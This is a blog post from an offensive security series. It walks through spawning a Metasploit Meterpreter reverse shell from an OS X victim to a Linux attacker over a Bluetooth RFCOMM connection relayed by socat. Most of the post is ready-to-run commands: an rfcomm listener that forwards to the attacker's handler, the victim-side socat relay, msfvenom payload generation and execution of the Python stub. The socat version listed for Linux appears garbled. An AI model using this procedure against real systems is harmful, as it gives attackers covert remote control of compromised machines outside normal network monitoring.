The last post on Shells with Spencer presented code to spawn a shell with a full PTY over a Bluetooth RFCOMM socket for extended post-exploitation access. This post presents an additional technique, this time for spawning a Metasploit Meterpreter session between two hosts over a Bluetooth RFCOMM socket. Specifically, in this proof of concept, a Meterpreter session is spawned from an OS X victim back to a Linux attacker.
This scenario requires no custom code on either side, just the socat utility on both the victim and attacking systems. At the time of this writing, the latest version of socat (2.0.0-b3) compiles without modification on the latest version of OS X, despite OS X not being listed as an officially supported OS.
Before the following procedure is started, the two systems must have been paired with one another following the standard process.
Linux (Metasploit) Setup
Our Meterpreter of choice in this scenario (to be run on the OS X system) is the venerable Python Meterpreter with the reverse_tcp stager. Before execution, the Metasploit instance needs to be configured with a matching listener; the “exploit/multi/handler” module serves this purpose. This listener accepts the TCP connection that socat, spawned by the rfcomm utility in the next step, bridges from the RFCOMM channel.
Important note: Metasploit will not accept Meterpreter sessions from a loopback (127.0.0.1) address. To get around this limitation, set LHOST on the handler to the IP address of any other interface (eth#, wlan#, etc.).
On the Linux host, a new RFCOMM socket must be set up to listen on channel 1 with the rfcomm utility. This utility can then spawn the socat command that forwards data to the TCP socket where Metasploit is patiently waiting for the new session. The following command uses sdptool to register channel 1 as a Serial Port (SP) service, then runs the rfcomm utility to listen on that channel and spawn socat when a connection is made to it:
sdptool add --channel=1 SP; rfcomm listen /dev/rfcomm0 1 /bin/socat file:/dev/rfcomm0,echo=0,raw tcp:192.168.90.1:4444
In the example above, 192.168.90.1 is the IP address of the adapter on the Linux host where the Metasploit handler is waiting for the connection, since 127.0.0.1 cannot be used.
OSX (Meterpreter) Setup
When the OS X system is connected to the Linux host via Bluetooth, a device file named /dev/tty.localhostlocaldomain-Se-1 becomes available, where localhostlocaldomain is the Linux host’s Bluetooth name with any periods removed. This file is the RFCOMM connection through which the two socat instances communicate. After compiling socat on the OS X host, it can be executed to forward the TCP connection from Meterpreter over that device file with the command:
./socat tcp-l:4444,reuseaddr,fork file:/dev/tty.localhostlocaldomain-Se-1,nonblock,waitlock=./sock.lock,raw
This command will not exit and should be left running in a background terminal.
The attacker must generate the payload ahead of time using msfvenom, making sure to set the LHOST parameter to the loopback address 127.0.0.1 so that the Python stub connects to the local socat instance rather than to the network. The LHOST and LPORT parameters passed to msfvenom must correspond to the listening address and port of the socat instance running on the OS X host. The LPORT setting does not need to be 4444, and it does not need to match the port specified on the Linux host. The command to generate this payload with msfvenom is:
./msfvenom -p python/meterpreter/reverse_tcp -f raw LHOST=127.0.0.1 LPORT=4444
Once both socat instances and Metasploit are waiting for their connections, the Bluetooth connection can be made, and finally the Python stub is run on the OS X host with:
python -c "[python stub]"
The result is a fully functioning and responsive Meterpreter session over the established Bluetooth connection.
The following software versions were used in this setup:
- Linux socat 220.127.116.11
- Linux Kernel 4.1.6-200
- OS X socat 2.0.0-b3
- OS X 10.10.4 (Yosemite)